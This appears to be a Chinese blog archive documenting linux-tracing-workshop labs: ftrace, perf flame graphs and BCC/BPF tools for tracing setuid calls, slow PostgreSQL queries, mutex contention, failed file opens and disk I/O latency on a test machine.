-> 4       : 6        |###                                   |
-> 8       : 1        |#                                     |
-> 16      : 4        |##                                    |
-> 32      : 4        |##                                    |

    >=(ms) .. <(ms)   : I/O      |Distribution                          |
-> 1       : 87       |################################      |
-> 2       : 106      |######################################|
-> 4       : 3        |##                                    |
-> 8       : 4        |##                                    |
-> 16      : 6        |###                                   |
-> 32      : 2        |#                                     |

    >=(ms) .. <(ms)   : I/O      |Distribution                          |
-> 1       : 102      |######################################|
-> 2       : 103      |######################################|
-> 4       : 7        |###                                   |
-> 8       : 1        |#                                     |
-> 16      : 5        |##                                    |

用bitesize可以看到大部分的io都比较小，但是也有比较大的：

    root@ubuntu1604:~/perf-tools/disk# ./bitesize 
    Tracing block I/O size (bytes), until Ctrl-C...
    ^C
            Kbytes         : I/O      Distribution
            -> 0.9       : 2722     |######################################|
            1.0 -> 7.9       : 2601     |##################################### |
            8.0 -> 63.9      : 1342     |###################                   |
            64.0 -> 127.9     : 0        |                                      |
            128.0 ->           : 145      |###                                   |

为了知道IO操作的来源，我们需要记录block:block_rq_insert点的栈回溯：

    root@ubuntu1604:~/perf-tools/disk# perf record -p $(pidof logger) -e block:block_rq_insert -g -- sleep 10
    [ perf record: Woken up 1 times to write data ]
    [ perf record: Captured and wrote 0.137 MB perf.data (450 samples) ]

生成火焰图：

    root@ubuntu1604:~/perf-tools/disk# perf script | ~/FlameGraph/stackcollapse-perf.pl | ~/FlameGraph/flamegraph.pl > io-stacks.svg

从火焰图可以看出来，IO的来源有两个线程，左边运行的时间比较多，应该就是小IO，右边运行得比较少，对应大IO。

linux-tracing-workshop-part 2

2017-12-07T00:00:00+00:00

记录linux-tracing-workshop实验过程，第二部分共三篇。

8. Writing BPF Tools: setuidsnoop
9. Writing BPF Tools: dbslower
10. Writing BPF Tools: Contention Stats and Stacks

8. Writing BPF Tools: setuidsnoop

本节试着写一个BPF来跟踪setuid系统调用。我们可以使用trace来跟踪setuid：

            root@ubuntu1604:~/bcc/tools# ./trace.py 'sys_setuid "uid=0x%x", arg1' 'r::sys_setuid "rc=%d", retval'
            PID    TID    COMM         FUNC             -
            34913  34913  su           sys_setuid       uid=0x3e8
            34913  34913  su           sys_setuid       rc=0
            34932  34932  cron         sys_setuid       uid=0x0
            34932  34932  cron         sys_setuid       rc=0

也可以写一个独立的BPF工具，本节模仿killsnoop.py内容实现setuid的trace。

第一步，替换sys_kill为sys_setuid

            kprobe__sys_kill->kprobe__sys_setuid
            kretprobe__sys_kill->kretprobe__sys_setuid

第二步，修改函数签名

            int kprobe__sys_setuid(struct pt_regs *ctx, int tpid, int sig)-->
            int kprobe__sys_setuid(struct pt_regs *ctx, u32 uid)

第三步，修改数据结构，用setuid的参数替换kill的参数

            struct val_t {
            u64 pid;
            u32 uid;
            char comm[TASK_COMM_LEN];
            };

            struct data_t {
            u64 pid;
            u32 uid;
            int ret;
            char comm[TASK_COMM_LEN];
            };

            class Data(ct.Structure):
            _fields_ = [
                    ("pid", ct.c_ulonglong),
                    ("uid", ct.c_uint),
                    ("ret", ct.c_int),
                    ("comm", ct.c_char * TASK_COMM_LEN)
            ]

第四步，在kprobe和kretprobe修改相应的数据

            int kprobe__sys_kill(struct pt_regs *ctx, u32 uid)
            {
            u32 pid = bpf_get_current_pid_tgid();
            FILTER

            struct val_t val = {.pid = pid};
            if (bpf_get_current_comm(&val.comm, sizeof(val.comm)) == 0) {
                    val.uid = uid;
                    infotmp.update(&pid, &val);
            }

            return 0;
            };

            int kretprobe__sys_kill(struct pt_regs *ctx)
            {
                    struct data_t data = {};
                    struct val_t *valp;
                    u32 pid = bpf_get_current_pid_tgid();

                    valp = infotmp.lookup(&pid);
                    if (valp == 0) {
                            // missed entry
                            return 0;
            }

            bpf_probe_read(&data.comm, sizeof(data.comm), valp->comm);
            data.pid = pid;
            data.uid = valp->uid;
            data.ret = PT_REGS_RC(ctx);

            events.perf_submit(ctx, &data, sizeof(data));
            infotmp.delete(&pid);

            return 0;
            }

第五步，修改print的数据

            print("%-9s %-6s %-16s %-6s %s" % (
            "TIME", "PID", "COMM", "UID", "RESULT"))

            # process event
            def print_event(cpu, data, size):
            event = ct.cast(data, ct.POINTER(Data)).contents

            if (args.failed and (event.ret >= 0)):
                    return

            print("%-9s %-6d %-16s %-6d %d" % (strftime("%H:%M:%S"),
                    event.pid, event.comm.decode(), event.uid, event.ret))

效果

            root@ubuntu1604:~/bcc/tools# ./setuidsnoop.py 
            TIME      PID    COMM             UID    RESULT
            11:41:05  36919  su               1000   0
            11:45:01  36941  cron             0      0

原实验完整版

9. Writing BPF Tools: dbslower

该实验开发一个机遇USDT probe的BCC工具，用来监控数据库的query延迟和执行。

首先下载postgresql，使用–enable-dtraceb编译，使其支持USDT，运行：

            $ cd /usr/local/pgsql/bin
            $ ./initdb -D /tmp/pgdata
            $ ./pg_ctl -D /tmp/pgdata start

查看USDT probe点：

            test@ubuntu1604:/usr/local/pgsql/bin$ /usr/share/bcc/tools/tplist  -p $(pgrep -n postgres) | grep query
            /usr/local/pgsql/bin/postgres postgresql:query__parse__start
            /usr/local/pgsql/bin/postgres postgresql:query__parse__done
            /usr/local/pgsql/bin/postgres postgresql:query__rewrite__start
            /usr/local/pgsql/bin/postgres postgresql:query__rewrite__done
            /usr/local/pgsql/bin/postgres postgresql:query__plan__start
            /usr/local/pgsql/bin/postgres postgresql:query__plan__done
            /usr/local/pgsql/bin/postgres postgresql:query__start
            /usr/local/pgsql/bin/postgres postgresql:query__done
            /usr/local/pgsql/bin/postgres postgresql:query__execute__start
            /usr/local/pgsql/bin/postgres postgresql:query__execute__done

本实验关注query__start 和 query__done，query__start第一个参数就是query参数。

下面根据实验给的整体框架完成工具编写。

第一步：找到PostgreSQL的进程ID

            dbpid = int(subprocess.check_output("pgrep -n postgres".split()))

第二步：定义数据结构，包含PID, timestamp, duration, 以及 query文本

            struct temp_t {
                    u64 timestamp;
                    char *query;
            };

            struct data_t {
                    u64 pid;
                    u64 timestamp;
                    u64 duration;
                    char query[256];
            };

            BPF_HASH(temp, u64, struct temp_t);
            BPF_PERF_OUTPUT(events);

第三步：第一两个函数处理query__start 和 query__end

            int probe_query_start(struct pt_regs *ctx) {
                    struct temp_t tmp = {};
                    tmp.timestamp = bpf_ktime_get_ns();
                    bpf_usdt_readarg(1, ctx, &tmp.query);
                    u64 pid = bpf_get_current_pid_tgid();
                    temp.update(&pid, &tmp);
                    return 0;
            }

            int probe_query_end(struct pt_regs *ctx) {
                    struct temp_t *tempp;
                    u64 pid = bpf_get_current_pid_tgid();
                    tempp = temp.lookup(&pid);
                    if (!tempp) 
                            return 0;
                    u64 delta = bpf_ktime_get_ns() - tempp->timestamp;
                    if (delta >=""" + str(threshold_ns) + """) {
                            struct data_t data = {};
                            data.pid = pid >> 32;
                            data.timestamp = tempp->timestamp;
                            data.duration = delta;
                            bpf_probe_read(&data.query, sizeof(data.query), tempp->query);
                            events.perf_submit(ctx, &data, sizeof(data));
                    }
                    temp.delete(&pid);
                    return 0;
            };

第四步：使用enable_probe enable query__start和query__end

            usdt = USDT(pid=int(dbpid))
            usdt.enable_probe("query__start", "probe_query_start")
            usdt.enable_probe("query__done", "probe_query_end")

第五步：定义Python数据结构b表示输出

            class Data(ct.Structure):
            _fields_ = [
                    ("pid", ct.c_ulonglong),
                    ("timestamp", ct.c_ulonglong),
                    ("delta", ct.c_ulonglong),
                    ("query", ct.c_char * 256)
            ]

第六步：输出

            start = 0

            def print_event(cpu, data, size):
                    global start
                    event = ct.cast(data, ct.POINTER(Data)).contents
                    if start == 0:
                            start = event.timestamp
                    print("%-14.6f %-6d %8.3f %s" % (float(event.timestamp - start) / 1000000000,
                            event.pid, float(event.delta) / 1000000, event.query))

            print("Tracing database queries for PID %d slower than %d ms..." %
                    (dbpid, args.threshold))
            print("%-14s %-6s %8s %s" % ("TIME(s)", "PID", "MS", "QUERY"))

            bpf["events"].open_perf_buffer(print_event)

效果：

            root@ubuntu1604:~/bcc/tools# ./lqdbslower.py  postgres 0
            /virtual/main.c:45:15: warning: comparison of unsigned expression >= 0 is always true [-Wtautological-compare]
            if (delta >=0) {
                    ~~~~~ ^ ~
            1 warning generated.
            Tracing database queries for PID 50216 slower than 0 ms...
            TIME(s)        PID          MS QUERY
            0.000000       50216     1.806 INSERT INTO tbl(name, date) VALUES('aaa', '2013-12-22');
            7.150496       50216     0.227 select * from tbl

原实验的dbslower.py

10. Writing BPF Tools: Contention Stats and Stacks

该实验编写一个基于BCC的观察Linux锁的竞争状态的工具。

首先编译，运行程序：

            root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -pthread  parprimes.c -o parprimes
            root@ubuntu1604:~/linux-tracing-workshop# ./parprimes 4 10000

在lockstat.py查找TODO完成该工具。

// TODO Update tm_key fields with the mutex, tid, and stack id

    tm_key.tid = pid;
    tm_key.mtx = entry->mtx;
    tm_key.lock_stack_id = stack_id;

// TODO Call locks.lookup_or_init(…) and update the wait time and the enter count // of the entry in the locks data structure

    struct thread_mutex_val_t *existing_tm_val, new_tm_val = {};
    existing_tm_val = locks.lookup_or_init(&tm_key, &new_tm_val);
    existing_tm_val->wait_time_ns += wait_time;
    if (PT_REGS_RC(ctx) == 0) {
            existing_tm_val->enter_count += 1;
    }

// TODO Update the mutex_lock_hist histogram with the time we held the lock

    u64 slot = bpf_log2l(hold_time / 1000);
    mutex_lock_hist.increment(slot);

// TODO Similarly to the previous probe, attach the following probes: // uprobe in pthread_mutex_lock handled by probe_mutex_lock // uretprobe in pthread_mutex_lock handled by probe_mutex_lock_return // uprobe in pthread_mutex_unlock handled by probe_mutex_unlock

    bpf.attach_uprobe(name="pthread", sym="pthread_mutex_lock", fn_name="probe_mutex_lock", pid=pid)
    bpf.attach_uretprobe(name="pthread", sym="pthread_mutex_lock", fn_name="probe_mutex_lock_return", pid=pid)
    bpf.attach_uprobe(name="pthread", sym="pthread_mutex_unlock", fn_name="probe_mutex_unlock", pid=pid)

// TODO Print a nicely formatted line with the mutex description, wait time, // hold time, enter count, and stack (use print_stack)

    print("\tmutex %s ::: wait time %.2fus ::: hold time %.2fus ::: enter count %d" %
            (mutex_descr, v.wait_time_ns/1000.0, v.lock_time_ns/1000.0, v.enter_count))
    print_stack(bpf, pid, stacks, k.lock_stack_id)

效果：

            root@ubuntu1604:~/linux-tracing-workshop# python lockstat.py  $(pidof parprimes)
            init stack for mutex 7fff3dfa1fa0 (#1)
                            [unknown] (7f2eebaa85a0)
                            [unknown] (7f2eeb6f5830)
                            [unknown] (113e258d4c544155)

            thread 53243
                    mutex [unknown] ::: wait time 7.01us ::: hold time 5.56us ::: enter count 1
                            [unknown] (7f2eebcccb34)
                            [unknown] (7f2eeb70eff8)
                            [unknown] (7f2eeba9b060)

            thread 53246
                    mutex #1 ::: wait time 1655.31us ::: hold time 809.63us ::: enter count 369
                            [unknown] (4009f0)
                            [unknown] (400a44)
                            [unknown] (7f2eebaa66ba)

            thread 53247
                    mutex #1 ::: wait time 12850.63us ::: hold time 660.04us ::: enter count 302
                            [unknown] (4009f0)
                            [unknown] (400a44)
                            [unknown] (7f2eebaa66ba)

            thread 53248
                    mutex #1 ::: wait time 13290.15us ::: hold time 610.43us ::: enter count 281
                            [unknown] (4009f0)
                            [unknown] (400a44)
                            [unknown] (7f2eebaa66ba)

            thread 53249
                    mutex #1 ::: wait time 1282.58us ::: hold time 621.87us ::: enter count 279
                            [unknown] (4009f0)
                            [unknown] (400a44)
                            [unknown] (7f2eebaa66ba)

            wait time (us)      : count     distribution
            0 -> 1          : 0        |                                        |
            2 -> 3          : 0        |                                        |
            4 -> 7          : 1229     |****************************************|
            8 -> 15         : 1        |                                        |
            16 -> 31         : 0        |                                        |
            32 -> 63         : 0        |                                        |
            64 -> 127        : 0        |                                        |
            128 -> 255        : 0        |                                        |
            256 -> 511        : 0        |                                        |
            512 -> 1023       : 0        |                                        |
            1024 -> 2047       : 0        |                                        |
            2048 -> 4095       : 0        |                                        |
            4096 -> 8191       : 0        |                                        |
            8192 -> 16383      : 2        |                                        |
            hold time (us)      : count     distribution
            0 -> 1          : 0        |                                        |
            2 -> 3          : 1227     |****************************************|
            4 -> 7          : 4        |                                        |
            8 -> 15         : 1        |                                        |

原实验解答lockstat-solution

linux-tracing-workshop-part 1

2017-12-05T00:00:00+00:00

记录linux-tracing-workshop实验过程，第一部分共七篇。

1. Probing Tracepoints with ftrace
2. CPU Sampling with perf and Flame Graphs
3. Using BPF Tools: Broken File Opens
4. Using BPF Tools: Slow File I/O
5. Using BPF Tools: Chasing a Memory Leak
6. Using BPF Tools: Database and Disk Stats and Stacks
7. Using BPF Tools: Node and JVM USDT Probes

1. Probing Tracepoints with ftrace

开启sched:sched_switch tracepoint进行线程切换跟踪

    root@ubuntu1604:~# cd /sys/kernel/debug/tracing/
    root@ubuntu1604:/sys/kernel/debug/tracing# echo 1 > tracing_on
    root@ubuntu1604:/sys/kernel/debug/tracing# cat events/sched/sched_switch/format 
    name: sched_switch
    ID: 273
    format:
        field:unsigned short common_type;	offset:0;	size:2;	signed:0;
        field:unsigned char common_flags;	offset:2;	size:1;	signed:0;
        field:unsigned char common_preempt_count;	offset:3;	size:1;	signed:0;
        field:int common_pid;	offset:4;	size:4;	signed:1;

        field:char prev_comm[16];	offset:8;	size:16;	signed:1;
        field:pid_t prev_pid;	offset:24;	size:4;	signed:1;
        field:int prev_prio;	offset:28;	size:4;	signed:1;
        field:long prev_state;	offset:32;	size:8;	signed:1;
        field:char next_comm[16];	offset:40;	size:16;	signed:1;
        field:pid_t next_pid;	offset:56;	size:4;	signed:1;
        field:int next_prio;	offset:60;	size:4;	signed:1;

    print fmt: "prev_comm=%s prev_pid=%d prev_prio=%d prev_state=%s%s ==> next_comm=%s next_pid=%d next_prio=%d", REC->prev_comm, REC->prev_pid, REC->prev_prio, REC->prev_state & (2048-1) ? __print_flags(REC->prev_state & (2048-1), "|", { 1, "S"} , { 2, "D" }, { 4, "T" }, { 8, "t" }, { 16, "Z" }, { 32, "X" }, { 64, "x" }, { 128, "K" }, { 256, "W" }, { 512, "P" }, { 1024, "N" }) : "R", REC->prev_state & 2048 ? "+" : "", REC->next_comm, REC->next_pid, REC->next_prio
    root@ubuntu1604:/sys/kernel/debug/tracing# echo 1 > events/sched/sched_switch/enable 

    root@ubuntu1604:/sys/kernel/debug/tracing# cat trace
    # tracer: nop
    #
    # entries-in-buffer/entries-written: 703/703   #P:1
    #
    #                              _-----=> irqs-off
    #                             / _----=> need-resched
    #                            | / _---=> hardirq/softirq
    #                            || / _--=> preempt-depth
    #                            ||| /     delay
    #           TASK-PID   CPU#  ||||    TIMESTAMP  FUNCTION
    #              | |       |   ||||       |         |
                bash-817   [000] d...   371.932169: sched_switch: prev_comm=bash prev_pid=817 prev_prio=120 prev_state=R ==> next_comm=kworker/u128:3 next_pid=80 next_prio=120
    kworker/u128:3-80    [000] d...   371.932187: sched_switch: prev_comm=kworker/u128:3 prev_pid=80 prev_prio=120 prev_state=S ==> next_comm=sshd next_pid=790 next_prio=120
                sshd-790   [000] d...   371.932226: sched_switch: prev_comm=sshd prev_pid=790 prev_prio=120 prev_state=S ==> next_comm=bash next_pid=817 next_prio=120
                bash-817   [000] d...   371.932236: sched_switch: prev_comm=bash prev_pid=817 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
            <idle>-0     [000] d...   371.935521: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
        rcu_sched-7     [000] d...   371.935525: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
            <idle>-0     [000] d...   371.939514: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
        rcu_sched-7     [000] d...   371.939517: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
            <idle>-0     [000] d...   371.943513: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
        rcu_sched-7     [000] d...   371.943516: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
            <idle>-0     [000] d...   371.947521: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
        rcu_sched-7     [000] d...   371.947525: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
            <idle>-0     [000] d...   371.951522: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
        rcu_sched-7     [000] d...   371.951527: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
            <idle>-0     [000] d...   371.955518: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
        rcu_sched-7     [000] d...   371.955522: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
            <idle>-0     [000] d...   371.959515: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
        rcu_sched-7     [000] d...   371.959518: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
            <idle>-0     [000] d...   371.963516: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120

    echo 0 > events/sched/sched_switch/enable

开启function tracer

函数调用

    root@ubuntu1604:/sys/kernel/debug/tracing# echo function > current_tracer
    root@ubuntu1604:/sys/kernel/debug/tracing# echo vfs_write > set_ftrace_filter
    root@ubuntu1604:/sys/kernel/debug/tracing# cat trace
            qemu-ga-449   [000] ....   591.951939: vfs_write <-SyS_write
            qemu-ga-449   [000] ....   591.951965: vfs_write <-SyS_write
            qemu-ga-449   [000] ....   591.952138: vfs_write <-SyS_write
            qemu-ga-449   [000] ....   591.952222: vfs_write <-SyS_write
            qemu-ga-449   [000] ....   591.952247: vfs_write <-SyS_write
            qemu-ga-449   [000] ....   591.957259: vfs_write <-SyS_write
            qemu-ga-449   [000] ....   591.957331: vfs_write <-SyS_write
            qemu-ga-449   [000] ....   591.957356: vfs_write <-SyS_write
            qemu-ga-449   [000] ....   591.957516: vfs_write <-SyS_write
    rs:main Q:Reg-425   [000] ....   591.957797: vfs_write <-SyS_write

查看具体的函数路径

    root@ubuntu1604:/sys/kernel/debug/tracing# echo function_graph > current_tracer 
    root@ubuntu1604:/sys/kernel/debug/tracing# echo > set_ftrace_filter 
    root@ubuntu1604:/sys/kernel/debug/tracing# echo vfs_write > set_graph_function 
    root@ubuntu1604:/sys/kernel/debug/tracing# cat trace

    0)    sshd-902    =>  rs:main-425  
    ------------------------------------------

    0)               |  vfs_write() {
    0)               |    rw_verify_area() {
    0)               |      security_file_permission() {
    0)               |        apparmor_file_permission() {
    0)               |          common_file_perm() {
    0)   0.137 us    |            aa_file_perm();
    0)   0.959 us    |          }
    0)   1.468 us    |        }
    0)   2.035 us    |      }
    0)   2.605 us    |    }

指定函数深度

    echo 2 > max_graph_depth

关闭

    # echo nop > current_tracer
    # echo > set_graph_function

2. CPU Sampling with perf and Flame Graphs

普通程序

编译程序：

    gcc -g -fno-omit-frame-pointer -fopenmp primes.c -o primes

    root@ubuntu1604:~/linux-tracing-workshop# export OMP_NUM_THREADS=16
    root@ubuntu1604:~/linux-tracing-workshop# perf record -g -F 997 -- ./primes

-g表示capture stack，-F表示采用频率，会在当前目录生成perf.data。

    root@ubuntu1604:~/linux-tracing-workshop# perf report --stdio
    # To display the perf.data header info, please use --header/--header-only options.
    #
    #
    # Total Lost Samples: 0
    #
    # Samples: 7K of event 'cpu-clock'
    # Event count (approx.): 7265797196
    #
    # Children      Self  Command  Shared Object      Symbol                         
    # ........  ........  .......  .................  ...............................
    #
        99.99%     0.00%  primes   primes             [.] main._omp_fn.0             
                |
                ---main._omp_fn.0
                    |          
                    |--99.97%-- is_prime
                    |          |          
                    |          |--85.01%-- is_divisible
                    |          |          |          
                    |          |          |--0.08%-- retint_user
                    |          |          |          prepare_exit_to_usermode
                    |          |          |          exit_to_usermode_loop

可以看到is_divisible花费时间很多，perf annotate可以看到更详细的情况。

root@ubuntu1604:~/linux-tracing-workshop# perf annotate

    is_divisible  /root/linux-tracing-workshop/primes                                                                                                                                                                   
        │
        │    int is_divisible(int n, int d)
        │    {
    0.02 │      push   %rbp
        │      mov    %rsp,%rbp
    5.98 │      mov    %edi,-0x4(%rbp)
        │      mov    %esi,-0x8(%rbp)
        │            return n % d == 0;
        │      mov    -0x4(%rbp),%eax
    3.51 │      cltd
    2.75 │      idivl  -0x8(%rbp)
    71.34 │      mov    %edx,%eax
        │      test   %eax,%eax
    5.51 │      sete   %al
    5.82 │      movzbl %al,%eax
        │    }
    5.07 │      pop    %rbp
        │    ← retq

查看火焰图：

    # perf script > primes.stacks
    # FlameGraph/stackcollapse-perf.pl primes.stacks > primes.collapsed
    # FlameGraph/flamegraph.pl primes.collapsed > primes.svg

从火焰图上可以看出确实是is_divisible这个函数用时多。

Java程序

下载安装 perf_map_agent

启动示例，先不要按Enter：

    root@ubuntu1604:~/linux-tracing-workshop# java -XX:+PreserveFramePointer -XX:-Inline slowy/App
    Press ENTER to start.

另一个终端：

    root@ubuntu1604:~/perf-map-agent/bin# jps
    20274 App
    20285 Jps
    root@ubuntu1604:~/perf-map-agent/bin# ./perf-java-report-stack  20274

接着在第一个终端开始，第二个终端可以看到数据，可以看到是isDivisible花了时间：

    Samples: 1K of event 'cpu-clock', Event count (approx.): 11969696850                                                                                                                                                                                                          
    Children      Self  Command  Shared Object       Symbol                                                                                                                                                                                                                     
    +  100.00%     0.00%  java     perf-20274.map      [.] call_stub
    +  100.00%     0.00%  java     libjvm.so           [.] 0xffff801f982d987b
    +  100.00%     0.00%  java     libjvm.so           [.] 0xffff801f982fb52e
    +  100.00%     0.00%  java     libjvm.so           [.] 0xffff801f982fde5f
    +  100.00%     0.00%  java     libjli.so           [.] 0xffff801f96337552
    +  100.00%     0.00%  java     libjli.so           [.] 0xffff801f9633b3dd
    +  100.00%     0.00%  java     libpthread-2.23.so  [.] start_thread
    +   89.79%    10.63%  java     perf-20274.map      [.] Lslowy/App;::isPrime
    +   89.20%    89.03%  java     perf-20274.map      [.] Lslowy/App;::isDivisible
    +   72.07%     0.00%  java     perf-20274.map      [.] Lslowy/App;::main
    +   17.13%     0.00%  java     perf-20274.map      [.] Lslowy/App;::main
    +   10.80%     0.08%  java     perf-20274.map      [.] Interpreter
    +    0.08%     0.00%  java     libjvm.so           [.] 0xffff801f97f82ab0
    +    0.08%     0.00%  java     [kernel.kallsyms]   [k] schedule

生成火焰图：

    root@ubuntu1604:~/perf-map-agent/bin# cd /tmp/
    root@ubuntu1604:/tmp# ls
    hsperfdata_root  java.svg  perf-18877.data.old  perf-20210.data  perf-20210.map  perf-20274.data  perf-20274.map  perf.data  perf-vdso.so-4k55kH  perf-vdso.so-HGHJGC
    root@ubuntu1604:/tmp# mv perf-20274.data perf.data
    root@ubuntu1604:/tmp# perf script | ~/FlameGraph/stackcollapse-perf.pl | ~/FlameGraph/flamegraph.pl --colors=java > java.svg

Node程序

Node程序需要带–perf_basic_prof启动。进入nodey启动run.sh

    root@ubuntu1604:~/linux-tracing-workshop/nodey# ./run.sh  perf

另一个终端开启perf

    root@ubuntu1604:~/perf-map-agent/bin# perf record -F 97 -p $(pgrep -n node) -g

第一个终端开始测试

    root@ubuntu1604:~/linux-tracing-workshop/nodey# ab -c 10 -n 100 -m POST 'http://localhost:3000/users/auth?username=foo&password=wrong'

终止可以查看数据

    root@ubuntu1604:~/perf-map-agent/bin# perf  report -i perf.data

当然，也可以生成火焰图

root@ubuntu1604:~/perf-map-agent/bin# perf script -i perf.data | ~/FlameGraph/stackcollapse-perf.pl | ~/FlameGraph/flamegraph.pl > node.svg

3. Using BPF Tools: Broken File Opens

这个实验会使用BCC Tool对程序启动过程的错误进行排查。

首先，编译有问题的程序：

    gcc -g -fno-omit-frame-pointer -O0 server.c -o server

运行server，虽然现实启动成功，但是它并没有初始化成功。看起来程序是卡住了，使用top可以发现server的cpu消耗还是挺多的. 查看server程序用户态和内核态的cpu利用率：

    root@ubuntu1604:~# pidstat -u -p $(pidof server) 1
    Linux 4.4.0-21-generic (ubuntu1604) 	12/04/2017 	_x86_64_	(1 CPU)

46:39 PM   UID       PID    %usr %system  %guest    %CPU   CPU  Command
46:40 PM     0     29947    1.15   11.49    0.00   12.64     0  server
46:41 PM     0     29947    1.18   11.76    0.00   12.94     0  server
46:42 PM     0     29947    5.62    6.74    0.00   12.36     0  server
46:43 PM     0     29947    2.30   10.34    0.00   12.64     0  server
46:44 PM     0     29947    1.11   11.11    0.00   12.22     0  server
46:45 PM     0     29947    2.27    9.09    0.00   11.36     0  server
    q12:46:46 PM     0     29947    3.53   10.59    0.00   14.12     0  server
46:47 PM     0     29947    1.16   11.63    0.00   12.79     0  server

可以看到，server在内核态的时候比较多。使用syscount查看，可以看到，server调用nanosleep和open这两个syscall比较频繁。

    root@ubuntu1604:~/perf-tools/bin# ./syscount -cp $(pidof server)
    Tracing PID 29947... Ctrl-C to end.
    ^CSYSCALL              COUNT
    nanosleep           202027
    open                202054
    root@ubuntu1604:~/perf-tools/bin# 

opensnoop可以查看进程issue的open请求：

    root@ubuntu1604:~# opensnoop -p $(pidof server)  -d 0.01
    Tracing open()s issued by PID 910 for 0.01 seconds (buffered)...
    COMM             PID      FD FILE
    server           910      -1 /etc/tracing-server-example.conf
    server           910      -1 /etc/tracing-server-example.conf
    server           910      -1 /etc/tracing-server-example.conf
    server           910      -1 /etc/tracing-server-example.conf
    server           910      -1 /etc/tracing-server-example.conf
    server           910      -1 /etc/tracing-server-example.conf
    server           910      -1 /etc/tracing-server-example.conf
    server           910      -1 /etc/tracing-server-example.conf
    server           910      -1 /etc/tracing-server-example.conf

这样问题的基本原因就大概清楚了，server试图访问/etc/tracing-server-example.conf文件，但是该文件并不存在，所以没有初始化成功。

我们也可以用argdist来查看函数或者系统调用的参数。比如我们查看nanosleep的参数，可以发现大多数都是在512~1023之间，server中的nanosleep是1000。

    root@ubuntu1604:~/bcc/tools# ./argdist.py -p $(pidof server) -H 'p::SyS_nanosleep(struct timespec *time):u64:time->tv_nsec'
    [14:09:10]
        time->tv_nsec       : count     distribution
            0 -> 1          : 0        |                                        |
            2 -> 3          : 0        |                                        |
            4 -> 7          : 0        |                                        |
            8 -> 15         : 0        |                                        |
            16 -> 31         : 0        |                                        |
            32 -> 63         : 0        |                                        |
            64 -> 127        : 0        |                                        |
        128 -> 255        : 0        |                                        |
        256 -> 511        : 0        |                                        |
        512 -> 1023       : 15864    |****************************************|
    [14:09:11]
        time->tv_nsec       : count     distribution
            0 -> 1          : 0        |                                        |
            2 -> 3          : 0        |                                        |
            4 -> 7          : 0        |                                        |
            8 -> 15         : 0        |                                        |
            16 -> 31         : 0        |                                        |
            32 -> 63         : 0        |                                        |
            64 -> 127        : 0        |                                        |
        128 -> 255        : 0        |                                        |
        256 -> 511        : 0        |                                        |
        512 -> 1023       : 15890    |****************************************|
    [14:09:12]

类似的，我们查看open的参数和返回值

    root@ubuntu1604:~/bcc/tools# ./argdist.py -p $(pidof server) -C 'p:c:open(char *filename):char*:filename'
    [14:13:04]
    p:c:open(char *filename):char*:filename
        COUNT      EVENT
        14626      filename = /etc/tracing-server-example.conf
    [14:13:05]
    p:c:open(char *filename):char*:filename
        COUNT      EVENT
        14606      filename = /etc/tracing-server-example.conf
    [14:13:06]
    p:c:open(char *filename):char*:filename
        COUNT      EVENT
        14482      filename = /etc/tracing-server-example.conf
    [14:13:07]
    p:c:open(char *filename):char*:filename
        COUNT      EVENT
        14400      filename = /etc/tracing-server-example.conf
    ^Croot@ubuntu1604:~/bcc/tools# ./argdist.py -p $(pidof server) -C 'r:c:open():int:$retval'
    [14:13:28]
    r:c:open():int:$retval
        COUNT      EVENT
        14451      $retval = -1
    [14:13:29]
    r:c:open():int:$retval
        COUNT      EVENT
        14441      $retval = -1
    ^Croot@ubuntu1604:~/bcc/tools# 

4. Using BPF Tools: Slow File I/O

这个实验会跟踪IO latency比较大的情况。

首先编译并允许实验程序。

    root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -O0 -pthread logger.c -o logger 
    root@ubuntu1604:~/linux-tracing-workshop# ./logger 

假设你知道了logger程序的延迟会偶尔比较大（所以让你来解决这个问题:)）。先怀疑是因为存在slow IO操作导致延迟大。使用biolatency看看：

    root@ubuntu1604:/usr/share/bcc/tools# ./biolatency 1
    Tracing block device I/O... Hit Ctrl-C to end.

        usecs               : count     distribution
            0 -> 1          : 0        |                                        |
            2 -> 3          : 0        |                                        |
            4 -> 7          : 0        |                                        |
            8 -> 15         : 0        |                                        |
            16 -> 31         : 0        |                                        |
            32 -> 63         : 0        |                                        |
            64 -> 127        : 0        |                                        |
        128 -> 255        : 0        |                                        |
        256 -> 511        : 0        |                                        |
        512 -> 1023       : 24       |*********                               |
        1024 -> 2047       : 98       |****************************************|
        2048 -> 4095       : 1        |                                        |
